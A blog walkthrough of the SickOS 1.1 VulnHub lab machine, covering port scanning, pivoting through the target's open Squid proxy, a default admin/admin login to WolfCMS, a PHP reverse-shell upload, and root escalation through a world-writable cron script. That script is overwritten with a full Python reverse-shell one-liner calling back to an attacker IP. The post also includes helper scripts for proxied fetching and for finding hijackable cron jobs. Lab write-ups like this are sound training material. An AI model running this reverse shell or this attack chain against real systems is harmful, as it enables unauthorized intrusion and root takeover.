
Friday, August 20, 2021

SickOS SERIES[I]

 

SickOS - VULNHUB - Linux -1.1





Complete walkthrough of this machine:

RECONNAISSANCE PHASE:

NETWORK DISCOVERY:


We can use a couple of tools for this task. One of them is arp-scan, which sends ARP requests to the broadcast address and waits for the hosts' replies over the same protocol, as you can see below:






The other tool is netdiscover, which works on the same principle but takes the network interface as a parameter:



NMAP:

In this step, from the attacker machine we gather information about the open ports and services of our target machine. We can add options to run NSE scripts and obtain information about vulnerabilities on the remote host (here: default scripts with -sC, version detection with -sV, all 65535 ports with -p -, and -Pn because the host does not answer ping):


nmap -sC -sV -n -v -p - 192.168.1.33 -Pn
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-08-20 19:42 CEST
NSE: Loaded 153 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 19:42
Completed NSE at 19:42, 0.00s elapsed
Initiating NSE at 19:42
Completed NSE at 19:42, 0.00s elapsed
Initiating NSE at 19:42
Completed NSE at 19:42, 0.00s elapsed
Initiating Connect Scan at 19:42
Scanning 192.168.1.33 [65535 ports]
Discovered open port 22/tcp on 192.168.1.33
Stats: 0:00:10 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 2.86% done; ETC: 19:48 (0:05:39 remaining)
Stats: 0:00:11 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 3.37% done; ETC: 19:47 (0:05:15 remaining)
Stats: 0:00:11 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 3.50% done; ETC: 19:47 (0:05:03 remaining)
Connect Scan Timing: About 23.82% done; ETC: 19:45 (0:02:11 remaining)
Discovered open port 3128/tcp on 192.168.1.33
Connect Scan Timing: About 52.70% done; ETC: 19:44 (0:01:04 remaining)
Stats: 0:01:45 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 90.92% done; ETC: 19:44 (0:00:10 remaining)
Stats: 0:01:45 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 91.18% done; ETC: 19:44 (0:00:10 remaining)
Stats: 0:01:45 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 91.38% done; ETC: 19:44 (0:00:10 remaining)
Completed Connect Scan at 19:44, 113.37s elapsed (65535 total ports)
Initiating Service scan at 19:44
Scanning 2 services on 192.168.1.33
Completed Service scan at 19:44, 11.03s elapsed (2 services on 1 host)
NSE: Script scanning 192.168.1.33.
Initiating NSE at 19:44
Completed NSE at 19:44, 0.83s elapsed
Initiating NSE at 19:44
Completed NSE at 19:44, 0.00s elapsed
Initiating NSE at 19:44
Completed NSE at 19:44, 0.00s elapsed
Nmap scan report for 192.168.1.33
Host is up (0.0026s latency).
Not shown: 65532 filtered ports
PORT     STATE  SERVICE    VERSION
22/tcp   open   ssh        OpenSSH 5.9p1 Debian 5ubuntu1.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 09:3d:29:a0:da:48:14:c1:65:14:1e:6a:6c:37:04:09 (DSA)
|   2048 84:63:e9:a8:8e:99:33:48:db:f6:d5:81:ab:f2:08:ec (RSA)
|_  256 51:f6:eb:09:f6:b3:e6:91:ae:36:37:0c:c8:ee:34:27 (ECDSA)
3128/tcp open   http-proxy Squid http proxy 3.1.19
| http-open-proxy: Potentially OPEN proxy.
|_Methods supported: GET HEAD
|_http-server-header: squid/3.1.19
|_http-title: ERROR: The requested URL could not be retrieved
8080/tcp closed http-proxy
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

NSE: Script Post-scanning.
Initiating NSE at 19:44
Completed NSE at 19:44, 0.00s elapsed
Initiating NSE at 19:44
Completed NSE at 19:44, 0.00s elapsed
Initiating NSE at 19:44
Completed NSE at 19:44, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 125.56 seconds

The conclusion of the nmap scan is that we found the following open ports and services: 22/tcp running OpenSSH 5.9p1 and 3128/tcp running a Squid 3.1.19 HTTP proxy that NSE flags as potentially open (GET and HEAD allowed). Port 8080/tcp is closed, and the remaining 65532 ports are reported as filtered, so a firewall is in front of the box; in particular, no web server is reachable directly on port 80.







EXPLOITATION:

** This target machine does not answer ICMP echo (ping), which is why the nmap scan above uses -Pn.


22 ssh

ssh root@192.168.1.33
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@    WARNING: REMOTE HOST IDENTIFICATION HAS CHANGED!     @
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
IT IS POSSIBLE THAT SOMEONE IS DOING SOMETHING NASTY!
Someone could be eavesdropping on you right now (man-in-the-middle attack)!
It is also possible that a host key has just been changed.
The fingerprint for the ECDSA key sent by the remote host is
SHA256:fBxcsD9oGyzCgdxtn34OtTEDXIW4E9/RlkxombNm0y8.
Please contact your system administrator.
Add correct host key in /home/kali/.ssh/known_hosts to get rid of this message.
Offending ECDSA key in /home/kali/.ssh/known_hosts:8
  remove with:
  ssh-keygen -f "/home/kali/.ssh/known_hosts" -R "192.168.1.33"
ECDSA host key for 192.168.1.33 has changed and you have requested strict checking.
Host key verification failed.

The warning above is not a problem on the target: the SSH client found a stale entry for 192.168.1.33 in the local known_hosts file (line 8, left over from another lab machine that used the same IP), so strict host-key checking refuses to connect. Removing the entry with the ssh-keygen -R command shown lets the connection proceed, but without valid credentials SSH is not the way in, so we move on to the proxy.

3128 squid proxy!






One of the most important keys to this CTF is realising that the exposed Squid service can be used as an HTTP proxy for your local browser and your tools, so that requests to ports the firewall filters are made by the target itself:









With the proxy enabled we can reach the target's web server on port 80 over HTTP: http://192.168.1.33/

And this is the index:



Reviewing the robots.txt file:



And we find a new path: /wolfcms
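As an added example (not code from the original post), the following Python script does the same pivot programmatically: it routes requests through the target's Squid proxy and pulls the paths listed in robots.txt. The proxy and target addresses are taken from the nmap output above; the robots.txt body embedded for the offline demo is constructed, the post only shows that the real file points at /wolfcms.

```python
import urllib.request
from urllib.parse import urljoin

PROXY = "http://192.168.1.33:3128"   # the target's Squid, from the nmap output
TARGET = "http://192.168.1.33/"      # web root that is only reachable through the proxy


def proxied_opener(proxy_url=PROXY):
    """Opener that sends every plain-HTTP request through the given proxy."""
    return urllib.request.build_opener(urllib.request.ProxyHandler({"http": proxy_url}))


def fetch_via_proxy(url, proxy_url=PROXY, timeout=10):
    """GET url through the proxy; returns (status, body_text)."""
    with proxied_opener(proxy_url).open(url, timeout=timeout) as resp:
        return resp.status, resp.read().decode("utf-8", "replace")


def parse_robots(text):
    """Paths named in Disallow:/Allow: records of a robots.txt body, in order, deduplicated."""
    seen, paths = set(), []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()      # drop comments
        if ":" not in line:
            continue
        key, value = (part.strip() for part in line.split(":", 1))
        if key.lower() in ("disallow", "allow") and value and value not in seen:
            seen.add(value)
            paths.append(value)
    return paths


def candidate_urls(base, robots_text):
    """Absolute URLs worth visiting, built from the robots.txt entries."""
    return [urljoin(base, path) for path in parse_robots(robots_text)]


# Constructed robots.txt body for the offline demo (not the target's real file).
SAMPLE_ROBOTS = """\
User-agent: *
Disallow: /wolfcms
Disallow: /wolfcms   # duplicate on purpose
Allow: /
"""

if __name__ == "__main__":
    for url in candidate_urls(TARGET, SAMPLE_ROBOTS):
        print("candidate:", url)
    try:
        status, body = fetch_via_proxy(urljoin(TARGET, "robots.txt"))
        print(status, candidate_urls(TARGET, body))
    except OSError as exc:        # no lab network: proxy unreachable
        print("live fetch skipped:", exc)
```

The same ProxyHandler trick works for any urllib-based tooling; for the browser, point its HTTP proxy setting at 192.168.1.33:3128.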




Searching for a way to exploit WolfCMS:

sudo searchsploit wolfcms
[sudo] password for kali: 
------------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
 Exploit Title                                                                                                                                  |  Path
------------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
Wolfcms 0.75 - Cross-Site Request Forgery / Cross-Site Scripting                                                                                | php/webapps/18652.txt
WolfCMS 0.8.3.1 - Cross-Site Request Forgery                                                                                                    | php/webapps/44418.txt
WolfCMS 0.8.3.1 - Open Redirection                                                                                                              | php/webapps/44421.txt
------------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
Shellcodes: No Results

It seems there is no direct route to remote code execution on the target, but the open-redirect advisory gives us a useful piece of information, the admin login URL:

kali@kali:~/VULNHUB/VulOS/data$ cat `sudo locate php/webapps/44421.txt` | grep admin
#  Navigate to http://[URL]/wolfcms/?/admin/login

At that login URL we can get in with the default credentials admin/admin:

http://192.168.1.33/wolfcms/?/admin/login





Create a new page with a PHP reverse shell as its content, editing these two lines:

$ip = '192.168.1.42';  // CHANGE THIS
$port = 8989;       // CHANGE THIS

** These variables must point to your attacker machine's IP and the port your listener will wait on.



* For example this reverse shell:
https://github.com/pentestmonkey/php-reverse-shell

Launch/preview the page content:

and on your attacker machine wait with a netcat listener on TCP port 8989 to catch the new session:




Obtaining the remote shell from the target machine:




Privilege Escalation:



Using a shell script (lse.sh), you can find the crontab weakness:



** You can find this script at:
https://github.com/diego-treitos/linux-smart-enumeration/blob/master/lse.sh

As you can see in the previous image, the Python script is owned by root but writable by everybody:

# ls -ltrh /var/www/connect.py
-rwxrwxrwx 1 root root 217 Aug 21 00:37 /var/www/connect.py


Since cron runs it every minute as root (* * * * * root /var/www/connect.py), we can overwrite it to spawn a reverse shell as root from the target to the attacker machine. After replacing its content with a Python reverse shell pointing at the attacker's IP and a second listener port (9999), it looks like this:


# cat /var/www/connect.py
import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.1.42",9999));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);


Waiting for the root shell on the attacker machine (netcat listener on port 9999, at most a minute later):
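As an added example (not code from the original post, nor part of lse.sh), the following Python reproduces the check that lse.sh made for us here: parse a system crontab, keep the jobs that run as root, and flag any absolute path in the command that is a world-writable regular file. The crontab text and file modes embedded are constructed samples; on a live target call find_hijackable_cron_jobs with the contents of /etc/crontab and the default real_stat lookup.

```python
import os
import re
import stat

# Constructed sample of a system crontab (not taken from the target).
SAMPLE_CRONTAB = """\
# /etc/crontab: system-wide crontab
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
* * * * * root /var/www/connect.py
*/5 * * * * root /usr/local/bin/backup.sh --quiet
30 2 * * * www-data /var/www/cleanup.sh
"""

# Constructed stand-in for os.stat(): path -> (st_mode, st_uid).
SAMPLE_MODES = {
    "/var/www/connect.py": (0o100777, 0),       # -rwxrwxrwx root: hijackable
    "/usr/local/bin/backup.sh": (0o100755, 0),  # -rwxr-xr-x root: fine
    "/var/www/cleanup.sh": (0o100777, 33),      # world-writable, but not run as root
    "/etc/cron.hourly": (0o040755, 0),          # directory, skipped
}

# Five schedule fields, the user, then the rest of the line as the command.
CRON_LINE = re.compile(r"^\s*((?:\S+\s+){5})(\S+)\s+(.+)$")


def parse_system_crontab(text):
    """Return (schedule, user, command) for every job line in /etc/crontab format.

    Comments, blank lines and VAR=value assignments are skipped; @reboot-style
    shortcuts are not handled (assumption: plain five-field schedules only).
    """
    jobs = []
    for line in text.splitlines():
        stripped = line.strip()
        if not stripped or stripped.startswith("#") or "=" in stripped.split()[0]:
            continue
        m = CRON_LINE.match(line)
        if m:
            schedule, user, command = m.groups()
            jobs.append((" ".join(schedule.split()), user, command.strip()))
    return jobs


def absolute_paths(command):
    """Tokens of the command that look like absolute paths (script, interpreter, args)."""
    return [tok for tok in command.split() if tok.startswith("/")]


def real_stat(path):
    """os.stat wrapper returning (mode, uid), or None when the path does not exist."""
    try:
        st = os.stat(path)
    except OSError:
        return None
    return st.st_mode, st.st_uid


def find_hijackable_cron_jobs(crontab_text, stat_lookup=real_stat):
    """Return (path, schedule, mode) for root jobs whose script anyone can overwrite.

    stat_lookup(path) must return (st_mode, st_uid) or None, so the check runs
    offline against constructed data as well as against a live filesystem.
    """
    hits = []
    for schedule, user, command in parse_system_crontab(crontab_text):
        if user != "root":
            continue
        for path in absolute_paths(command):
            info = stat_lookup(path)
            if info is None:
                continue
            mode, _uid = info
            if stat.S_ISREG(mode) and mode & stat.S_IWOTH:
                hits.append((path, schedule, oct(stat.S_IMODE(mode))))
    return hits


if __name__ == "__main__":
    for path, schedule, mode in find_hijackable_cron_jobs(SAMPLE_CRONTAB, SAMPLE_MODES.get):
        print(f"[!] root cron job '{schedule}' runs world-writable {path} ({mode})")
```

The check only looks at the script's own mode bits; a writable parent directory (which would allow replacing the file) is a separate condition worth testing as well.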





And that is all for this lab machine. I hope you enjoyed the SickOS 1.1 server and that you'll follow my blog [https://roadtooscp-f0ns1.blogspot.com/].
We'll keep in touch.

with kind regards, f0ns1

